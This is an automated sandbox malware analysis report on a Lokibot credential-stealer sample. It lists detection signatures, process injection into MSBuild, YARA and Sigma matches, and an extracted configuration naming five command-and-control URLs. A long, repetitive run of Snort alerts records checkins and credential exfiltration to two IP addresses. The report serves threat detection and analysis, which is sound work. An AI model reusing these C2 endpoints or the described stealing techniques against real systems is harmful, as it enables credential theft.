Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report gunzipped.exe

Overview

General Information

Sample Name:gunzipped.exe
Analysis ID:553234
MD5:a76b143e354a2ac9f363616ff4f8b239
SHA1:51bb9b6f0c004d4532ae7f83b58554c924f4d3cc
SHA256:d9bad692a869fdb2d3e9ec678e50f27e2dbe2f1fef185a8480df7eb5562d88f0
Tags:exeLoki
Infos:

Most interesting Screenshot:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Yara detected Lokibot
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
.NET source code references suspicious native API functions
Tries to steal Mail credentials (via file registry)
Machine Learning detection for sample
Allocates memory in foreign processes
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign processes
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
PE / OLE file has an invalid certificate
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • gunzipped.exe (PID: 7116 cmdline: "C:\Users\user\Desktop\gunzipped.exe" MD5: A76B143E354A2AC9F363616FF4F8B239)
    • MSBuild.exe (PID: 1852 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe MD5: D621FD77BD585874F9686D3A76462EF1)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "https://jnxxx1.xyz/JRM/w2/fre.php"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.931659993.0000000000C58000.00000004.00000020.sdmpJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    00000001.00000002.931501458.0000000000400000.00000040.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000001.00000002.931501458.0000000000400000.00000040.00000001.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
        00000001.00000002.931501458.0000000000400000.00000040.00000001.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
          00000001.00000002.931501458.0000000000400000.00000040.00000001.sdmpLoki_1Loki Payloadkevoreilly
          • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
          • 0x153fc:$a2: last_compatible_version
          Click to see the 34 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          1.0.MSBuild.exe.400000.5.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            1.0.MSBuild.exe.400000.5.raw.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
              1.0.MSBuild.exe.400000.5.raw.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
                1.0.MSBuild.exe.400000.5.raw.unpackLoki_1Loki Payloadkevoreilly
                • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
                • 0x153fc:$a2: last_compatible_version
                1.0.MSBuild.exe.400000.5.raw.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
                • 0x13bff:$des3: 68 03 66 00 00
                • 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
                • 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
                Click to see the 61 entries

                Sigma Overview

                System Summary:

                barindex
                Sigma detected: Possible Applocker BypassShow sources
                Source: Process startedAuthor: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ParentCommandLine: "C:\Users\user\Desktop\gunzipped.exe" , ParentImage: C:\Users\user\Desktop\gunzipped.exe, ParentProcessId: 7116, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe, ProcessId: 1852

                Jbx Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Found malware configurationShow sources
                Source: 00000000.00000002.670595515.000000000275A000.00000004.00000001.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "https://jnxxx1.xyz/JRM/w2/fre.php"]}
                Antivirus / Scanner detection for submitted sampleShow sources
                Source: gunzipped.exeAvira: detected
                Machine Learning detection for sampleShow sources
                Source: gunzipped.exeJoe Sandbox ML: detected
                Source: 0.0.gunzipped.exe.3f0000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen
                Source: gunzipped.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                Source: gunzipped.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                Source: Binary string: .pdbBSJB source: gunzipped.exe, 00000000.00000002.670163943.0000000000A40000.00000004.00020000.sdmp
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

                Networking:

                barindex
                Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49770 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49770 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49770 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49770 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49771 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49771 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49771 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49771 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49772 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49772 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49772 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49772 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49773 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49773 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49773 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49773 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49774 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49774 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49774 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49774 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49775 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49775 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49775 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49775 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49776 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49776 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49776 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49776 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49777 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49777 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49777 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49777 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49778 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49778 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49778 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49778 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49779 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49779 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49779 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49779 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49780 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49780 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49780 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49780 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49781 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49781 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49781 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49781 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49782 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49782 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49782 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49782 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49783 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49783 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49783 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49783 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49786 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49786 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49786 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49786 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49787 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49787 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49787 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49787 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49788 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49788 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49788 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49788 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49789 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49789 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49789 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49789 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49790 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49790 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49790 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49790 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49791 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49791 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49791 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49791 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49792 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49792 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49792 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49792 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49793 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49793 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49793 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49793 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49794 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49794 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49794 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49794 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49795 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49795 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49795 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49795 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49796 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49796 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49796 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49796 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49797 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49797 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49797 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49797 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49798 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49798 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49798 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49798 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49800 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49800 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49800 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49800 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49807 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49807 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49807 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49807 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49819 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49819 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49819 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49819 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49834 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49834 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49834 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49834 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49837 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49837 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49837 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49837 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49839 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49839 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49839 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49839 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49845 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49845 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49845 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49845 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49846 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49846 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49846 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49846 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49847 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49847 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49847 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49847 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49855 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49855 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49855 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49855 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49862 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49862 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49862 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49862 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49870 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49870 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49870 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49870 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49874 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49874 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49874 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49874 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49875 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49875 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49875 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49875 -> 104.21.60.171:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49876 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49876 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49876 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49876 -> 172.67.198.111:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49877 -> 104.21.60.171:80
